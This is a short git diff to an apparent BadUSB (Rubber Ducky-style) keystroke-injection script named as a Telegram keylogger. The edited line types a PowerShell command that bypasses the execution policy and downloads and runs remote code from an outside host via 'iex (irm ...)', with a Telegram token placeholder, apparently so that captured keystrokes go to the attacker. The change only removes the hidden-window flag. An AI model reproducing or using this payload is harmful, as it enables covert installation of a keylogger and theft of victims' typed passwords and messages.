diff --git a/Telegram-Keylogger/Keylogger-to-Telegram.txt b/Telegram-Keylogger/Keylogger-to-Telegram.txt index 7c73358..111547c 100644 --- a/Telegram-Keylogger/Keylogger-to-Telegram.txt +++ b/Telegram-Keylogger/Keylogger-to-Telegram.txt @@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $tg='TOKEN_HERE'; iex (irm bw0.cc/tgkl) +STRING powershell -Ep Bypass -C $tg='TOKEN_HERE'; iex (irm bw0.cc/tgkl) ENTER